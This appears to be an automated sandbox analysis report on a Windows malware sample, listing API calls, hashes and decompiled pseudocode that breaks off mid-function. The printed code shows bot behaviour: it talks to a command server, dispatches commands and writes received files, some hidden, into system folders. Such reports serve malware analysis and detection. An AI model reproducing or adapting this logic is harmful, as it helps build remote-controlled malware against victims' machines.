0x0040923f
0x00409241
0x00409249
0x0040924b
0x0040924b
0x00409259
0x0040925e
0x00409261
0x00409270
0x00000000
0x00409272
0x00409279
0x0040927f
0x00000000
0x0040929b
0x0040928e
0x0040928e
0x0040928f
0x00409293
0x00000000
0x00000000
0x0040928c
0x0040929a
0x0040929a
0x00000000
0x0040929a
0x0040928c
0x00409298
0x00000000
0x004092a8
0x004092a5
0x004092b2
0x004092b2
0x004092b5
0x004092b5
0x004092b6
0x004092bf
0x004092cf
0x004092d5
0x004092db
0x00409319
0x0040931f
0x00000000
0x00000000
0x00000000
0x00000000
0x004092dd
0x004092dd
0x004092dd
0x004092e1
0x00000000
0x00000000
0x004092e7
0x004092e7
0x00000000
0x004092dd
0x004092a7
0x004092a7
0x004092b0
0x004092bd
0x00000000
0x004092bd
0x00000000
0x004092b0
0x00000000
0x00409298
0x00000000
0x00000000
0x00000000
0x00000000
0x00409281
0x00409281
0x00409281
0x00409282
0x00000000
0x00409287
0x00409270
0x00409226
0x0040922c
0x00000000
0x00000000
0x0040922e
0x00409230
0x00409230
0x00409233
0x00409233
0x00409235
0x00409236
0x0040923c
0x00000000
0x004092ea
0x004092ed
0x004092ef
0x004092f6
0x004092f6
0x004092fc
0x004092ff
0x00000000

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShellSleep
String ID:
API String ID: 4194306370-0
Opcode ID: 81da36da6e69adc00e0cb2cfffbbe3a903d6fd6272529730d891abfeac9bc17a
Instruction ID: 5fea5e1b15d9187b6cdc511d2afc01ce650ad8af0150c489a19ba70d9433e7e1
Opcode Fuzzy Hash: 81da36da6e69adc00e0cb2cfffbbe3a903d6fd6272529730d891abfeac9bc17a
Instruction Fuzzy Hash: B541EE718083497EEB269A64988C7E73BA49B52300F2809FFD496B72D3D7BC4D818759

Uniqueness

Uniqueness Score: -1.00%

Function 02230DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02230223,?,?), ref: 02230E02
SetErrorMode.KERNELBASE(00000000,?,?,02230223,?,?), ref: 02230E07

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 1eb0a082441fc5df915dc0da98a78a61be0cad001a755f32f9d8105225bcf8fd
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: F1D0127225522CB7DB012AD4DC09BCEBB5C9F05BAAF008021FB0DE9581CBB09A4146FA

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC2, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				long _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c; // 0xc6a9b8fb
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x5e5e5e5e;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed
						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c; // 0xc6a9b8fb
				}
				return _t6;
			}

0x00406dc5
0x00406dd5
0x00406de4
0x00406dea
0x00406df1
0x00406df4
0x00406df4
0x00406df6
0x00406df7
0x00406e00
0x00406e24
0x00406e24
0x00406e02
0x00406e14
0x00406e1a
0x00406e22
0x00000000
0x00000000
0x00406e22
0x00406e2e
0x00406e2e
0x00406e35

APIs

Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
String ID:
API String ID: 1823874839-0
Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C

Uniqueness

Uniqueness Score: -1.00%

Function 02230920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02230929

Memory Dump Source

Source File: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, Offset: 02230000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
Instruction ID: 81cc2d85be0b363c656950924f38b6f44aec89e449adb5a9cb9224a94380d57e
Opcode Fuzzy Hash: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
Instruction Fuzzy Hash: 8B90047034415C11DD3435DC0C11F0501015745774F3007317130DD1D4DC4055003315

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040C913, Relevance: 115.1, APIs: 45, Strings: 20, Instructions: 1397
filestringprocessCOMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0040C913() {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				signed int _v17;
				signed int _v24;
				signed int _v35;
				CHAR* _v39;
				signed int _v52;
				long _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				signed int _v72;
				signed int _v76;
				char _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				struct _PROCESS_INFORMATION _v120;
				char _v408;
				struct _PROCESS_INFORMATION _v424;
				char _v440;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v508;
				intOrPtr _v512;
				char _v640;
				intOrPtr _v688;
				intOrPtr _v720;
				intOrPtr _v728;
				intOrPtr _v732;
				CHAR* _v736;
				char _v740;
				struct _STARTUPINFOA _v808;
				struct _STARTUPINFOA _v876;
				char _v1176;
				void* __ebp;
				intOrPtr _t362;
				intOrPtr _t368;
				void* _t369;
				signed int _t388;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				CHAR* _t403;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed int _t416;
				void* _t417;
				CHAR* _t418;
				signed int _t421;
				CHAR* _t428;
				signed int _t429;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t449;
				signed int _t453;
				signed int _t456;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t467;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t479;
				CHAR* _t483;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t491;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				CHAR* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;

				_v64 = 0;
				_v68 = 0;
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					E0040C517();
				}
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					L21:
					__eflags = 0;
					return 0;
				} else {
					 *0x412104 = E0040E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x41210c = E0040E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0040E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x412108 = _t362;
					if( *0x4136b0 != 0) {
						L7:
						_t747 =  *0x413674;
						_t688 =  *0x41366c;
						_v12 = 0;
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0040F428(E00402684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								_t369 = E0040F43E(_t368,  &_v640, 0xc8, 0);
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E00408F53( &_v640, 0xc8);
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x413684 = 1;
									 *0x413678 = 0;
									 *0x41367c = 0;
									E0040EA84(1, "localcfg", "ip", _v496);
									_v104 = E0040F04E(0);
									_v100 = _t748;
									E0040EA84(1, "localcfg", "srv_time", _v492);
									E0040EA84(1, "localcfg", "local_time", _v104);
									E00408FB6( &_v440,  &_v640);
									E00408FB6( &_v92,  &_v640);
									E0040EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0040C65C(_v16,  &_v640,  &_v92, 0x412118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x412148 = 0;
										 *0x41215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											_t392 = E0040C75D(_v16,  &_v640,  &_v440,  *0x4136b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x41215c);
														if( *(_t789 + 0x41215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0040F1ED(_t789,  &_v96, 0xa);
																E0040E654(E00408C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x4136b0;
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
																				if(_v64 != 0) {
																					goto L228;
																				}
																				_t758 = _v8[0x413300];
																				__eflags = _t758;
																				if(_t758 == 0) {
																					L225:
																					_v8 =  &(_v8[4]);
																					__eflags = _v8 - 0x80;
																					if(_v8 < 0x80) {
																						continue;
																					}
																					__eflags = _v64;
																					if(_v64 != 0) {
																						goto L228;
																					}
																					_v39 = 0;
																					_t408 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, 0,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t408;
																					if(_t408 > 0) {
																						goto L24;
																					}
																					goto L228;
																				}
																				_t409 =  *(_t758 + 0x4c);
																				__eflags = _t409;
																				if(_t409 == 0) {
																					goto L225;
																				}
																				_t410 =  *_t409( &_v76,  &_v39,  *0x4136b0, 0x100000);
																				while(1) {
																					_t811 = _t811 + 0x10;
																					_v52 = _t410;
																					__eflags = _t410;
																					if(_t410 <= 0) {
																						break;
																					}
																					_t413 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t410,  &_v52);
																					_t811 = _t811 + 0x18;
																					__eflags = _t413;
																					if(_t413 <= 0) {
																						_v64 = 1;
																						goto L225;
																					}
																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x4136b0, 0x100000);
																				}
																				goto L225;
																			}
																			break;
																		}
																		_t416 = E00407DD6(_t748);
																		__eflags = _t416;
																		if(_t416 != 0) {
																			goto L215;
																		}
																		_t417 = E0040F04E(0);
																		__eflags =  *0x4136ac - _t748;
																		if(__eflags > 0) {
																			goto L215;
																		}
																		if(__eflags < 0) {
																			L209:
																			__eflags =  *0x4121a8; // 0x0
																			if(__eflags == 0) {
																				goto L215;
																			}
																			__eflags =  *0x4121a4; // 0x0
																			if(__eflags != 0) {
																				L214:
																				_t418 =  *0x4136b0;
																				 *_t418 = 0;
																				_t733 =  *0x4121a4; // 0x0
																				_t418[4] = _t733;
																				_t734 =  *0x4122d4; // 0x0
																				_t418[8] = _t734;
																				_v39 = 0x34;
																				_t421 = E0040C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
																				_t811 = _t811 + 0x18;
																				__eflags = _t421;
																				if(_t421 <= 0) {
																					break;
																				}
																				goto L215;
																			}
																			_t791 = E0040675C(0x4121a8,  &_v72, 0);
																			_t811 = _t811 + 0xc;
																			__eflags = _t791;
																			if(_t791 != 0) {
																				 *0x4122d4 = E004024C2(_t791, _v72, 0);
																				 *0x4121a4 = _v72;
																				E0040EC2E(_t791);
																				_t811 = _t811 + 0x10;
																			}
																			__eflags =  *0x4121a4; // 0x0
																			if(__eflags == 0) {
																				goto L215;
																			} else {
																				goto L214;
																			}
																		}
																		__eflags =  *0x4136a8 - _t417;
																		if( *0x4136a8 > _t417) {
																			goto L215;
																		}
																		goto L209;
																	}
																	E0040E854(1, "localcfg", "except_info",  *0x4136b0, 0x100000, 0x410264);
																	_t428 =  *0x4136b0;
																	_t811 = _t811 + 0x18;
																	_t736 =  &(_t428[1]);
																	do {
																		_t748 =  *_t428;
																		_t428 =  &(_t428[1]);
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_t429 = _t428 - _t736;
																	_v12 = _t429;
																	__eflags = _t429;
																	if(_t429 <= 0) {
																		goto L204;
																	}
																	E0040E8A1(_t748, 1, "localcfg", "except_info", 0x410264);
																	_v39 = 0xf;
																	_t434 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _v12,  &_v52);
																	_t811 = _t811 + 0x28;
																	__eflags = _t434;
																	if(_t434 <= 0) {
																		break;
																	}
																	goto L204;
																}
																_t760 = 0;
																__eflags =  *0x412184; // 0x0
																if(__eflags != 0) {
																	E00406F5F( &_v408, 0x120);
																	_t449 =  *0x412130; // 0x0
																	_push(0x412184);
																	asm("sbb eax, eax");
																	_push( &_v408);
																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
																	__eflags = _t453;
																	_push(_t453);
																	_push( *0x412159 & 0x000000ff);
																	_push( *0x412134);
																	_push( *0x412120);
																	_t456 = wsprintfA( *0x4136b0, E00402544("PromptOnSecureDesktop", 0x410fa0, 0x27, 0xe4, 0xc8));
																	_t811 = _t811 + 0x34;
																	_t760 = _t456;
																}
																_t793 =  *0x4122d8; // 0x0
																__eflags = _t793;
																if(_t793 == 0) {
																	L193:
																	__eflags = _t760;
																	if(_t760 == 0) {
																		goto L199;
																	}
																	_v39 = 0xb;
																	_t438 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t760,  &_v52);
																	_t811 = _t811 + 0x18;
																	__eflags = _t438;
																	if(_t438 <= 0) {
																		break;
																	}
																	__eflags =  *0x412184; // 0x0
																	if(__eflags != 0) {
																		 *0x412184 = 0;
																	}
																	_t439 =  *0x4122d8; // 0x0
																	__eflags = _t439;
																	if(_t439 != 0) {
																		E0040EC2E(_t439);
																		 *0x4122d8 = 0;
																	}
																	goto L199;
																} else {
																	_t441 = _t793;
																	_t293 = _t441 + 1; // 0x1
																	_t738 = _t293;
																	do {
																		_t748 =  *_t441;
																		_t441 = _t441 + 1;
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_v60 = _t441 - _t738;
																	E0040EE08( &(( *0x4136b0)[_t760]), _t793, _t441 - _t738 + 1);
																	_t811 = _t811 + 0xc;
																	_t760 =  &(_v60[_t760]);
																	__eflags = _t760;
																	goto L193;
																}
															}
															while(1) {
																_t459 = E0040C06C( &_v24,  &_v39,  *0x4136b0, 0x100000);
																_t811 = _t811 + 0x10;
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L186;
																}
																_t462 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t459,  &_v52);
																_t811 = _t811 + 0x18;
																__eflags = _t462;
																if(_t462 <= 0) {
																	goto L228;
																}
															}
															goto L186;
														}
														_push(0x71c7);
														_push( *0x4136b0);
														_t463 = E0040E7B4();
														__eflags = _t463;
														if(_t463 <= 0) {
															goto L182;
														}
														_v39 = 2;
														_t467 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t463 * 0x24,  &_v52);
														_t811 = _t811 + 0x18;
														__eflags = _t467;
														if(_t467 <= 0) {
															break;
														}
														goto L182;
													}
													E00403A00(_t697,  *0x4136b0);
													_v39 = 3;
													_t472 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, 0x28,  &_v52);
													_t811 = _t811 + 0x1c;
													__eflags = _t472;
													if(_t472 <= 0) {
														break;
													}
													goto L179;
												}
												_push(_t697);
												_push(0x100000);
												_push(_t403);
												while(1) {
													_t473 = E00403C09(_t748);
													_t811 = _t811 + 0xc;
													__eflags = _t473;
													if(_t473 == 0) {
														goto L177;
													}
													_t697 =  &_v52;
													_v39 = 4;
													_t476 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t473,  &_v52);
													_t811 = _t811 + 0x18;
													__eflags = _t476;
													if(_t476 <= 0) {
														goto L228;
													}
													_t478 = _v24 & 0x00000010;
													__eflags = _t478;
													_push(_t478);
													_push(0x100000);
													_push( *0x4136b0);
												}
												goto L177;
											}
											__eflags = _t395 - 2;
											if(_t395 == 2) {
												_t479 = E0040DF4C(_t748,  *0x4136b0);
												__eflags = _t479;
												if(_t479 != 0) {
													E0040ED3B( &(( *0x4136b0)[4]), "work_srv", 8);
													_t483 =  *0x4136b0;
													_t811 = _t811 + 0xc;
													__eflags =  *_t483 - 1;
													if( *_t483 == 1) {
														_t485 = E0040EED1( &(_t483[4]), "work_srv");
														__eflags = _t485;
														if(_t485 == 0) {
															 *0x413680 = 0;
															 *0x413674 = 0;
															 *0x413678 = 0;
															 *0x41367c = 0;
															E0040C517();
															_v68 = 1;
														}
													}
												}
												continue;
											}
											__eflags = _t395 - 0xa;
											if(__eflags == 0) {
												E004031D0( *0x4136b0, _v52);
												L46:
												continue;
											}
											if(__eflags <= 0) {
												L156:
												_t763 = 0;
												__eflags = 0;
												do {
													_t488 =  *(_t763 + 0x413300);
													__eflags = _t488;
													if(_t488 == 0) {
														goto L165;
													}
													_t795 =  *(_t488 + 0x40);
													__eflags = _t795;
													if(_t795 == 0) {
														goto L165;
													}
													_t748 = 0;
													_t489 = _t488 + 0xc;
													__eflags = _t489;
													while(1) {
														_t705 =  *_t489;
														__eflags = _t705;
														if(_t705 == 0) {
															goto L165;
														}
														__eflags = _t705 - _v39;
														if(_t705 == _v39) {
															 *_t795(_v39,  *0x4136b0, _v52);
															_t811 = _t811 + 0xc;
															goto L165;
														}
														_t748 = _t748 + 1;
														_t489 = _t489 + 4;
														__eflags = _t748 - 0xa;
														if(_t748 < 0xa) {
															continue;
														}
														goto L165;
													}
													L165:
													_t763 = _t763 + 4;
													__eflags = _t763 - 0x80;
												} while (_t763 < 0x80);
												continue;
											}
											__eflags = _t395 - 0xc;
											if(_t395 <= 0xc) {
												_t796 =  *0x4136b0;
												_t764 = 0;
												_v60 = 0;
												_v8 = _t796;
												__eflags =  *_t796;
												if( *_t796 <= 0) {
													L57:
													_t491 = _t764;
													_t797 =  &(( *0x4136b0)[4 + _t491 * 8]);
													_t492 = _v52 + 4 + _t491 * 8;
													_t704 = _t797[0x124] + 0x128;
													_v8 = _t492;
													__eflags = _t797[0x124] + 0x128 - _t492;
													while(1) {
														_v12 = 0;
														if(__eflags > 0) {
															break;
														}
														__eflags = _v8;
														if(_v8 <= 0) {
															break;
														}
														__eflags =  *_t797 & 0x00000003;
														if(( *_t797 & 0x00000003) == 0) {
															L150:
															_t494 = _t797[0x124];
															_t704 = 0xfffffed8 - _t494;
															_v8 =  &(_v8[0xfffffffffffffed8]);
															_t797 =  &(_t797[_t494 + 0x128]);
															__eflags = _t797[0x124] + 0x128 - _v8;
															continue;
														} else {
															E0040EE2A(_t704,  &_v408, 0, 0x120);
															_t499 =  *_t797;
															_t811 = _t811 + 0xc;
															_t765 = 0;
															_t711 = 0x100;
															__eflags = _t499 & 0x00000f80;
															if((_t499 & 0x00000f80) == 0) {
																_t618 = _t499 | 0x00000100;
																__eflags = _t618;
																 *_t797 = _t618;
															}
															_t500 =  *_t797;
															__eflags = _t500 & 0x00000800;
															if((_t500 & 0x00000800) != 0) {
																_t616 = _t500 & 0xfffff7ff;
																 *_t797 = _t616;
																__eflags =  *0x41201e; // 0x0
																if(__eflags == 0) {
																	_t617 = _t616 | 0x00000200;
																	__eflags = _t617;
																} else {
																	_t617 = _t616 | _t711;
																}
																 *_t797 = _t617;
															}
															_t501 =  *_t797;
															__eflags = _t501;
															if(_t501 >= 0) {
																__eflags = _t711 & _t501;
																if((_t711 & _t501) == 0) {
																	__eflags = _t501 & 0x00000200;
																	if((_t501 & 0x00000200) == 0) {
																		__eflags = _t501 & 0x00000400;
																		if((_t501 & 0x00000400) == 0) {
																			goto L96;
																		}
																		GetSystemDirectoryA( &_v408, 0x100);
																		_t595 =  &_v408;
																		_t775 = _t595 + 1;
																		do {
																			_t723 =  *_t595;
																			_t595 = _t595 + 1;
																			__eflags = _t723;
																		} while (_t723 != 0);
																		_t596 = _t595 - _t775;
																		__eflags = _t596;
																		if(_t596 != 0) {
																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
																			}
																		}
																		E0040EF1E( &_v408, "drivers\\");
																		_t776 =  &_v408;
																		_t141 = _t776 + 1; // 0x5d
																		_t711 = _t141;
																		do {
																			_t599 =  *_t776;
																			_t776 = _t776 + 1;
																			__eflags = _t599;
																		} while (_t599 != 0);
																		_t765 = _t776 - _t711;
																		__eflags = _t765;
																		goto L96;
																	}
																	GetSystemDirectoryA( &_v408, 0x100);
																	_t777 =  &_v408;
																	_t602 = _t777 + 1;
																	do {
																		_t711 =  *_t777;
																		_t777 = _t777 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t777 - _t602;
																	__eflags = _t765;
																	goto L83;
																} else {
																	GetEnvironmentVariableA(E00402544(0x4122f8, 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																	E0040EE2A(_t711, 0x4122f8, 0, 0x100);
																	_t607 =  &_v408;
																	_t811 = _t811 + 0x20;
																	_t779 = _t607 + 1;
																	do {
																		_t711 =  *_t607;
																		_t607 = _t607 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t607 - _t779;
																	L83:
																	__eflags = _t765;
																	if(_t765 == 0) {
																		goto L96;
																	}
																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
																	goto L85;
																}
															} else {
																_t780 =  &(_t797[4]);
																_t609 =  &(_t797[4]);
																_t726 =  &(_t609[1]);
																goto L69;
																do {
																	L71:
																	_t711 =  *_t613;
																	_t613 = _t613 + 1;
																	__eflags = _t711;
																} while (_t711 != 0);
																_t765 = _t613 - _t781;
																__eflags = _t765;
																if(_t765 == 0) {
																	L96:
																	__eflags =  *_t797 & 0x00000004;
																	if(( *_t797 & 0x00000004) == 0) {
																		_t502 =  &(_t797[0x104]);
																		L106:
																		_push(_t502);
																		L107:
																		lstrcatA( &_v408, ??);
																		L108:
																		__eflags =  *_t797 & 0x00000040;
																		if(( *_t797 & 0x00000040) != 0) {
																			E00408E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
																			_t811 = _t811 + 0x18;
																		}
																		__eflags = _v39 - 0xc;
																		if(_v39 == 0xc) {
																			_t583 = E0040EE95( &_v408, ".dat");
																			_pop(_t711);
																			__eflags = _t583;
																			if(_t583 != 0) {
																				SetFileAttributesA( &_v408, 0x80);
																			}
																		}
																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																		__eflags = _t766 - 0xffffffff;
																		if(_t766 == 0xffffffff) {
																			E0040EE2A(_t711,  &_v408, 0, 0x120);
																			GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																			E0040EE2A(_t711, "PromptOnSecureDesktop", 0, 0x100);
																			_t513 =  &_v408;
																			_t811 = _t811 + 0x2c;
																			_t768 = _t513 + 1;
																			do {
																				_t712 =  *_t513;
																				_t513 = _t513 + 1;
																				__eflags = _t712;
																			} while (_t712 != 0);
																			_t514 = _t513 - _t768;
																			__eflags = _t514;
																			if(_t514 != 0) {
																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
																				}
																			}
																			lstrcatA( &_v408,  &(_t797[0x104]));
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t545 = E0040EE95( &_v408, ".dat");
																				_pop(_t712);
																				__eflags = _t545;
																				if(_t545 != 0) {
																					SetFileAttributesA( &_v408, 0x80);
																				}
																			}
																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																			__eflags = _t769 - 0xffffffff;
																			if(_t769 != 0xffffffff) {
																				WriteFile(_t769,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																				CloseHandle(_t769);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t541 = E0040EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t541;
																					if(_t541 != 0) {
																						SetFileAttributesA( &_v408, 2);
																					}
																				}
																				_v12 = 1;
																			}
																			goto L143;
																		} else {
																			WriteFile(_t766,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
																			CloseHandle(_t766);
